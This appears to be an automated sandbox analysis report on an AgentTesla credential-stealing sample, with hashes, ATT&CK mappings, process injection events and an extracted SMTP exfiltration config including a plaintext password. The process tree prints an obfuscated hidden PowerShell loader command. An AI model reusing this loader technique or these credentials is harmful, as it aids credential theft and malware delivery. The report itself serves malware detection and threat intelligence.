agenttesla | aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96

General

Target

aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe
Size

706KB
MD5

6374e8854e99b03c91f3eabec0327631
SHA1

5bddc6e6aa06c5c7527200f46fbcb4051b0080fc
SHA256

aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96
SHA512

99790ea8a469125600e990c175f8255ab4a26fa6f52a27cced0b325cada4948631b22b10ca50cbf998ad0fbb7d185fa8af3c48b87126bba15f3e52682cf32b20
SSDEEP

12288:YvDJMGRn+cqPnbCHp5T6/b4b/n1yNFwP0nRU9:UDV8cq2HphQbsaeP0W9

Score

10^/10

agenttesla credential_access discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
cp8nl.hyperhost.ua
Port:
587
Username:
[email protected]
Password:
7213575aceACE@#$
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2756	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2680	powershell.exe
2756	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2680 set thread context of 2756	2680	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
2680	powershell.exe
2756	wab.exe
2756	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2680	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2756	wab.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 2680	1792	aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe	30
PID 1792 wrote to memory of 2680	1792	aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe	30
PID 1792 wrote to memory of 2680	1792	aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe	30
PID 1792 wrote to memory of 2680	1792	aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe	30
PID 2680 wrote to memory of 2756	2680	powershell.exe	34
PID 2680 wrote to memory of 2756	2680	powershell.exe	34
PID 2680 wrote to memory of 2756	2680	powershell.exe	34
PID 2680 wrote to memory of 2756	2680	powershell.exe	34
PID 2680 wrote to memory of 2756	2680	powershell.exe	34
PID 2680 wrote to memory of 2756	2680	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe
"C:\Users\Admin\AppData\Local\Temp\aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Unpartiality=Get-Content 'C:\Users\Admin\AppData\Local\Konfektionernes\Begyndelsesvaerdi.unl';$Rystning=$Unpartiality.SubString(10064,3);.$Rystning($Unpartiality)
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Konfektionernes\Begyndelsesvaerdi.unl

Filesize
55KB

MD5
208dfbe71d1925d841a590fa36ea53b0

SHA1
ead752338cc3679678aae24a43a0f77ae663182f

SHA256
639d8904b660164e9788b28702b075abb4c70c616c30a566f555fe053fa94006

SHA512
b3d3681d00108335ac303544a45a523de035f013740d9cca228752561097f88e6698f11cca9e0c706f7c511285193fcc1b774543612bfd52ec9540e62b546b16

Download Submit
C:\Users\Admin\AppData\Local\Konfektionernes\Oktanters.Str

Filesize
332KB

MD5
095f140bbda8fe02bba77d80449b3ba9

SHA1
00a66a1ae19454e700928c7aa68ad7589d532449

SHA256
cbc3573c429561a70dff70fe38d3fc592617d8ef344ca825d0d450bb3ce4d4e6

SHA512
28852d2ce3e2e56ab60f192d848c26cb8781cd82454d541a772a8daebb64724dccb485954edf52d1455a3ff1f23c056d4e9c1c7604ff41634b6022d5d7fa0e6e

Download Submit
memory/2680-13-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-9-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-8-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-11-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-7-0x0000000073C71000-0x0000000073C72000-memory.dmp

Filesize
4KB

Download
memory/2680-10-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-15-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-16-0x0000000006820000-0x000000000A172000-memory.dmp

Filesize
57.3MB

Download
memory/2680-17-0x0000000073C70000-0x000000007421B000-memory.dmp

Filesize
5.7MB

Download
memory/2756-18-0x0000000000F90000-0x0000000001FF2000-memory.dmp

Filesize
16.4MB

Download
memory/2756-19-0x0000000000F90000-0x0000000001FF2000-memory.dmp

Filesize
16.4MB

Download
memory/2756-20-0x0000000000F90000-0x0000000000FD0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing